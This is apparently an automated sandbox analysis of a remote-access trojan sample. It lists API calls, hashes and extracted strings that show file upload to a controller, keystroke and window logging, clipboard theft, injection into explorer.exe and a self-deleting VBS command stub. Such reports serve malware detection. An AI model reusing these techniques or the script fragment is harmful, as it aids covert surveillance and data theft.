                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                  • _free.LIBCMT ref: 004513A1
                                                                                                  • _free.LIBCMT ref: 004513B6
                                                                                                  • _free.LIBCMT ref: 004513C1
                                                                                                  • _free.LIBCMT ref: 004513E3
                                                                                                  • _free.LIBCMT ref: 004513F6
                                                                                                  • _free.LIBCMT ref: 00451404
                                                                                                  • _free.LIBCMT ref: 0045140F
                                                                                                  • _free.LIBCMT ref: 00451447
                                                                                                  • _free.LIBCMT ref: 0045144E
                                                                                                  • _free.LIBCMT ref: 0045146B
                                                                                                  • _free.LIBCMT ref: 00451483
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                  • String ID:
                                                                                                  • API String ID: 161543041-0
                                                                                                  • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                  • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                                                                  • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                  • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                                                                  Function 00408BB5 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 328fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                                                                  • __aulldiv.LIBCMT ref: 00408D88
                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                                                                  • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                                                                                  • API String ID: 3086580692-2596673759
                                                                                                  • Opcode ID: 160633e4da690031bbe2cd61954ec08d7589a01c574f3dfc20b15958750bfdda
                                                                                                  • Instruction ID: 2d1ece25e1b497defd969945f9de4b01d63c4d7912a1bb42583949d7b10afa87
                                                                                                  • Opcode Fuzzy Hash: 160633e4da690031bbe2cd61954ec08d7589a01c574f3dfc20b15958750bfdda
                                                                                                  • Instruction Fuzzy Hash: 76B1A0316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB9B
                                                                                                  Function 0040D83A Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                                                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                                                                                    • Part of subcall function 00413733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 0041374F
                                                                                                    • Part of subcall function 00413733: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00413768
                                                                                                    • Part of subcall function 00413733: RegCloseKey.ADVAPI32(?), ref: 00413773
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                                                                  • ExitProcess.KERNEL32 ref: 0040D9FF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                  • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$HSG$Temp$exepath$open
                                                                                                  • API String ID: 1913171305-833065420
                                                                                                  • Opcode ID: f07d7b2f95756806177599d1f8f4961b197936d164d25737559c426f2532322c
                                                                                                  • Instruction ID: 050033375253242a90a907d975c9615f3488646990559cd5331657e2136e0730
                                                                                                  • Opcode Fuzzy Hash: f07d7b2f95756806177599d1f8f4961b197936d164d25737559c426f2532322c
                                                                                                  • Instruction Fuzzy Hash: 514139319001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E4ACA98
                                                                                                  Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • connect.WS2_32(?,?,?), ref: 004048E0
                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                                  • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                  • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                  • API String ID: 994465650-2151626615
                                                                                                  • Opcode ID: 2d49116b9c675fc5002ccfaaed315144ad6d64ba8ccd8faf84a893bd454578e1
                                                                                                  • Instruction ID: d7ad8a6a5323ad03425d5def7d05b30a9c8ce31cd4ccd690c712fe6c843f15aa
                                                                                                  • Opcode Fuzzy Hash: 2d49116b9c675fc5002ccfaaed315144ad6d64ba8ccd8faf84a893bd454578e1
                                                                                                  • Instruction Fuzzy Hash: AD41E8B575060277C61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF
                                                                                                  Function 00450680 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free
                                                                                                  • String ID:
                                                                                                  • API String ID: 269201875-0
                                                                                                  • Opcode ID: eb0df5fda3918316229511e27b327a59e2685e6d7c39cee33e37fcee88581610
                                                                                                  • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                                                                  • Opcode Fuzzy Hash: eb0df5fda3918316229511e27b327a59e2685e6d7c39cee33e37fcee88581610
                                                                                                  • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                                                                  Function 00455C5B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                                                                                  • GetLastError.KERNEL32 ref: 00455D6F
                                                                                                  • __dosmaperr.LIBCMT ref: 00455D76
                                                                                                  • GetFileType.KERNEL32(00000000), ref: 00455D82
                                                                                                  • GetLastError.KERNEL32 ref: 00455D8C
                                                                                                  • __dosmaperr.LIBCMT ref: 00455D95
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                                                                  • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                                                                  • GetLastError.KERNEL32 ref: 00455F31
                                                                                                  • __dosmaperr.LIBCMT ref: 00455F38
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                  • String ID: H
                                                                                                  • API String ID: 4237864984-2852464175
                                                                                                  • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                                  • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                                                                  • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                                  • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                                                                  Function 00450AA5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free
                                                                                                  • String ID: \&G$\&G$`&G
                                                                                                  • API String ID: 269201875-253610517
                                                                                                  • Opcode ID: 0a05fa7fafc3926735f9ff598043b48751ea8cfb3e4d07056946ce3260a8f3c6
                                                                                                  • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                                                                  • Opcode Fuzzy Hash: 0a05fa7fafc3926735f9ff598043b48751ea8cfb3e4d07056946ce3260a8f3c6
                                                                                                  • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                                                                  Function 00414BEB Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 65535$udp
                                                                                                  • API String ID: 0-1267037602
                                                                                                  • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                                  • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                                                                  • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                                  • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                                                                  Function 0040AD11 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                                                                  • GetForegroundWindow.USER32 ref: 0040AD84
                                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                  • String ID: [${ User has been idle for $ minutes }$]
                                                                                                  • API String ID: 911427763-3954389425
                                                                                                  • Opcode ID: b06ca0c711f551fa613fb528b9a86c1082eaad7740c8b83a56c6ee9751395190
                                                                                                  • Instruction ID: 1462e2e3b317a3feaa81e481452c264ee2198f2d95b6ea563507fc8e19ff55dc
                                                                                                  • Opcode Fuzzy Hash: b06ca0c711f551fa613fb528b9a86c1082eaad7740c8b83a56c6ee9751395190
                                                                                                  • Instruction Fuzzy Hash: 7F51E1716043419BC714FB62D846AAE7795AF84308F10093FF546A22E2EF7C9D44C69F
                                                                                                  Function 0040DA6F Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: LongNamePath
                                                                                                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                  • API String ID: 82841172-425784914
                                                                                                  • Opcode ID: e90a508e1a457d7f5fc2a2102fccd42b178b01a1a2d424220c9b7a47bb93cca0
                                                                                                  • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                                                                  • Opcode Fuzzy Hash: e90a508e1a457d7f5fc2a2102fccd42b178b01a1a2d424220c9b7a47bb93cca0
                                                                                                  • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
                                                                                                  Function 0043A8BA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                                                                  • GetLastError.KERNEL32(?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                                                                  • __dosmaperr.LIBCMT ref: 0043A926
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                                                                  • GetLastError.KERNEL32(?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                                                                  • __dosmaperr.LIBCMT ref: 0043A963
                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401BD9,?), ref: 0043A9A6
                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                                                                  • __dosmaperr.LIBCMT ref: 0043A9B7
                                                                                                  • _free.LIBCMT ref: 0043A9C3
                                                                                                  • _free.LIBCMT ref: 0043A9CA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 2441525078-0
                                                                                                  • Opcode ID: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                                                                                  • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                                                                  • Opcode Fuzzy Hash: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                                                                                  • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                                                                  Function 0044ACC9 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 216COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,tC,0043EA74,?,?,?,0044AF1A,00000001,00000001,A4E85006), ref: 0044AD23
                                                                                                  • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0044AF1A,00000001,00000001,A4E85006,?,?,?), ref: 0044ADA9
                                                                                                  • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,A4E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                                                                  • __freea.LIBCMT ref: 0044AEB0
                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B60,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                                                                  • __freea.LIBCMT ref: 0044AEB9
                                                                                                  • __freea.LIBCMT ref: 0044AEDE
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                  • String ID: tC
                                                                                                  • API String ID: 3864826663-886086030
                                                                                                  • Opcode ID: a3cbb47ee8d45342a2f0fb6a002504832f0ae0c467949e665f7c3dc78735deda
                                                                                                  • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                                                                  • Opcode Fuzzy Hash: a3cbb47ee8d45342a2f0fb6a002504832f0ae0c467949e665f7c3dc78735deda
                                                                                                  • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                                                                  Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                                                                                  • TranslateMessage.USER32(?), ref: 0040557E
                                                                                                  • DispatchMessageA.USER32(?), ref: 00405589
                                                                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F88), ref: 00405641
                                                                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                  • API String ID: 2956720200-749203953
                                                                                                  • Opcode ID: 406689eb07ce060b1dcd97a74506ab079ccadf2d4c581598b986e42cef4983c7
                                                                                                  • Instruction ID: af141abdc89e6f99b360bf73ca1bd21391e8bea30a055eafc68b1e1601de11b4
                                                                                                  • Opcode Fuzzy Hash: 406689eb07ce060b1dcd97a74506ab079ccadf2d4c581598b986e42cef4983c7
                                                                                                  • Instruction Fuzzy Hash: 6F419E71604301ABCB14FB76DC5A86F37A9AB85704F40493EF516A32E1EF3C8905CB9A
                                                                                                  Function 00417D1A Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                                                                  • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                                  • String ID: <$@$@VG$@VG$Temp
                                                                                                  • API String ID: 1704390241-1291085672
                                                                                                  • Opcode ID: 9a720f4f888f1525bdbf75a62ef7587c2160d9ec115db0d441fc7e9c2bd624ef
                                                                                                  • Instruction ID: 17e4c8e037c7e297ff37edeb8814921eaebe5ca95f3622e3753009d7d6553322
                                                                                                  • Opcode Fuzzy Hash: 9a720f4f888f1525bdbf75a62ef7587c2160d9ec115db0d441fc7e9c2bd624ef
                                                                                                  • Instruction Fuzzy Hash: 15417E319002199ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                                                                  Function 004073E7 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 99COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(00472B28,00000000,RGw@,00003000,00000004,00000000,00000001), ref: 00407418
                                                                                                  • GetCurrentProcess.KERNEL32(00472B28,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe), ref: 004074D9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CurrentProcess
                                                                                                  • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$RGw@
                                                                                                  • API String ID: 2050909247-1783200977
                                                                                                  • Opcode ID: a6b1f7e6a89e8d10aee47b8b65162d365cd1003091a90439fbe9ba5c5e211239
                                                                                                  • Instruction ID: b8c3dc73ce560081c95a6921e0e4b034ac7c55c8f908ce4a4bfc67d5bc942e58
                                                                                                  • Opcode Fuzzy Hash: a6b1f7e6a89e8d10aee47b8b65162d365cd1003091a90439fbe9ba5c5e211239
                                                                                                  • Instruction Fuzzy Hash: 7631C271604700ABD311EF65DE46F1677A8FB48315F10087EF509E6292DBB8B8418B6E
                                                                                                  Function 0041697B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • OpenClipboard.USER32 ref: 0041697C
                                                                                                  • EmptyClipboard.USER32 ref: 0041698A
                                                                                                  • CloseClipboard.USER32 ref: 00416990
                                                                                                  • OpenClipboard.USER32 ref: 00416997
                                                                                                  • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                                  • CloseClipboard.USER32 ref: 004169BF
                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                  • String ID: !D@
                                                                                                  • API String ID: 2172192267-604454484
                                                                                                  • Opcode ID: 714596017678f15f46549e3b50181fa6cb84449448661dd5f115107523fa2353
                                                                                                  • Instruction ID: 51ec5b3583c04982a71d168622c94cade283f75070810aedfe93923cca0dc87c
                                                                                                  • Opcode Fuzzy Hash: 714596017678f15f46549e3b50181fa6cb84449448661dd5f115107523fa2353
                                                                                                  • Instruction Fuzzy Hash: 41014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                                                                  Function 0041330D Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                                                                  • CloseHandle.KERNEL32(?), ref: 004134A0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                                  • String ID:
                                                                                                  • API String ID: 297527592-0
                                                                                                  • Opcode ID: 54f028f0095e40716ae3e28f8762c2292f5de559e5ff64128e84570d1459992b
                                                                                                  • Instruction ID: cfdeae1586e3f17d3ae994cf28232467201964e06db1490d1c70a6fe2d897c90
                                                                                                  • Opcode Fuzzy Hash: 54f028f0095e40716ae3e28f8762c2292f5de559e5ff64128e84570d1459992b
                                                                                                  • Instruction Fuzzy Hash: A841F371104301BBD7109F26EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                                                                  Function 0041AB9E Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
